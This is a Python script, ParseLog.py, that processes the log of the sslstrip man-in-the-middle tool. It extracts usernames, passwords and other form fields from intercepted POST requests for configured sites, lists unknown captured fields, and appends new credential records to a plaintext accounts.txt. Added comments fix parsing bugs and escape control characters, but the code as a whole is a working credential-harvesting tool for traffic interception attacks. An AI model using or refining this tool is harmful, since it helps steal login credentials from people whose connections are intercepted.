#!/usr/bin/env python
#####################
# ParseLog.py
#
# By z3ros3c@gmail.com
#####################
""" This file parses the sslstrip.log created by
sslstrip for usernames and passwords (and other
interesting information) defined in the file
resources/definitions.sslstrip. It will also
give you a complete list of all unknown information,
with the exception of anything listed in the file
resources/blacklist.sslstrip.
"""
from urllib import unquote
def getIP(origin):
    """Return the text between the first '(' and the first ')' of *origin*.

    Both positions come from str.find, so a missing parenthesis gives index
    -1 and the slice is taken relative to that instead of raising.
    """
    opening = origin.find('(')
    closing = origin.find(')')
    return origin[opening + 1:closing]


# Module-level state; the script section at the bottom of the file rebinds
# these from the files it manages to read.
blacklist = []      # origins that process() skips
accounts = []       # formatted account records collected so far
definitions = {}    # origin -> [display name, field name, ...]
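def getDefs(defs):
    """Parse definition lines into a dict keyed by each line's first item.

    Every line is split on '|'. The first item becomes the key and the
    remaining items, in order, become the value list. process() looks the
    key up by origin, then treats the first list item as a display name and
    the rest as the form-field names to report.

    Args:
        defs: iterable of text lines, with or without a line ending.

    Returns:
        dict mapping the first item of each usable line to the list of the
        other items on that line.
    """
    parsed = {}
    for definition in defs:
        # Strip the whole line ending so CRLF files do not leave a stray
        # carriage return glued to the last field name.
        entry = definition.rstrip('\r\n')
        # A blank or separator-less line used to raise IndexError, which the
        # caller's blanket except turned into "no definitions at all".
        # Skip only the offending line instead.
        if '|' not in entry:
            continue
        parts = entry.split('|')
        parsed[parts[0]] = parts[1:]
    return parsed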
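def getAllVars(line):
    """Decode one URL-encoded form body into a dict of field -> value.

    The line is logged request data and must be treated as untrusted input.
    Runs of '&' are collapsed, each pair is split on its first '=', and both
    sides are percent-decoded exactly once. A key containing '$' is reduced
    to the part after the last '$'.

    Args:
        line: the raw data line, optionally ending in a line break.

    Returns:
        dict of decoded field names to decoded values. Pairs without '='
        are ignored.
    """
    # Drop the line ending before decoding. Checking for a newline after
    # decoding, as before, also matched an encoded newline inside a value
    # and chopped that value's last character.
    line = line.rstrip('\r\n')
    while '&&' in line:
        line = line.replace('&&', '&')
    fields = {}
    for pair in line.split('&'):
        # Split on the first '=' only, so a value that itself contains '='
        # is kept instead of being silently discarded.
        key, separator, value = pair.partition('=')
        if not separator:
            continue
        # Decode once. Decoding an already-decoded string would expand a
        # literal "%25xx" a second time and corrupt the value.
        key = unquote(key)
        if '$' in key:
            key = key.split('$').pop()
        # NOTE: unquote leaves '+' as-is; form-encoded spaces are not turned
        # back into spaces here.
        fields[key] = unquote(value)
    return fields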
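def _neutralize(text):
    """Return *text* with ASCII control characters shown as \\xNN escapes."""
    safe = []
    for char in text:
        code = ord(char)
        if code < 32 or code == 127:
            safe.append('\\x%02x' % code)
        else:
            safe.append(char)
    return ''.join(safe)


def process(origin, line):
    """Report the form fields of one logged request.

    The origin is extracted with getIP() and skipped if blacklisted. For an
    origin present in ``definitions`` the configured fields are formatted
    into a single record. The record is printed only when every field was
    present, and is added to ``accounts`` (and tagged "**NEW**" on output)
    the first time it is seen. For any other origin all non-empty fields
    are printed under an "Unknown:" heading.

    Args:
        origin: the log line that names the request's host in parentheses.
        line: the log line holding the URL-encoded request body.
    """
    origin = getIP(origin)
    if origin in blacklist:
        return
    fields = getAllVars(line)

    if origin not in definitions:
        # Logged values are untrusted. Escape control characters so they
        # cannot inject terminal escape sequences or fake extra output lines.
        print("Unknown:\t%s" % _neutralize(origin))
        for key in fields:
            if fields[key] != "":
                print("\t%s:\t%s" % (_neutralize(key),
                                     _neutralize(fields[key])))
        return

    definition = definitions[origin][:]
    name = definition.pop(0)
    account = "(%s) " % name
    # Track missing fields with a flag. The old substring test on the
    # formatted record also dropped records whose data merely contained the
    # word "UNDEFINED".
    complete = True
    for variable in definition:
        if variable in fields:
            # Records are stored one per line in accounts.txt, so an
            # embedded newline must not be allowed to split a record.
            value = _neutralize(fields[variable])
        else:
            value = 'UNDEFINED'
            complete = False
        account += "%s = %s :: " % (variable, value)
    if not complete:
        return
    if account not in accounts:
        accounts.append(account)
        account += "**NEW**"
    print(account)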
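# --- Script section: load inputs, walk the log, persist new records ---

# A missing or unreadable log is treated as empty.
try:
    with open('sslstrip.log', 'r') as log_file:
        lines = log_file.readlines()
except IOError:
    lines = []

try:
    with open('resources/blacklist.sslstrip', 'r') as blacklist_file:
        blacklist = blacklist_file.read().split('\n')
except IOError:
    print("--blacklist not defined--")

try:
    with open('accounts.txt', 'r') as accounts_file:
        accounts = accounts_file.read().split('\n')
except IOError:
    pass
# Remember what is already on disk so that only new records are appended.
stored = set(accounts)

try:
    with open('resources/definitions.sslstrip', 'r') as definitions_file:
        definitions = getDefs(definitions_file.readlines())
except (IOError, IndexError):
    # Report the problem instead of silently running with no definitions.
    print("--definitions not defined--")

if not lines:
    print("Empty logfile.")
else:
    # A line containing 'POST' is followed by the line holding its data.
    # Iterating avoids the repeated pop(0) calls and the IndexError at the
    # end of the log that was misreported as "Empty logfile.".
    entries = iter(lines)
    for line in entries:
        if 'POST' not in line:
            continue
        body = next(entries, None)
        if body is None:
            break
        process(line, body)

# NOTE(review): accounts.txt stores recovered credentials in plaintext and is
# created with whatever permissions the process umask allows. Restrict access
# to it.
accounts.sort()
# The file is opened for append. Writing the full list, as before, duplicated
# every previously stored record on each run.
with open('accounts.txt', 'a') as output:
    for account in accounts:
        if account != '' and account not in stored:
            output.write(account + '\n')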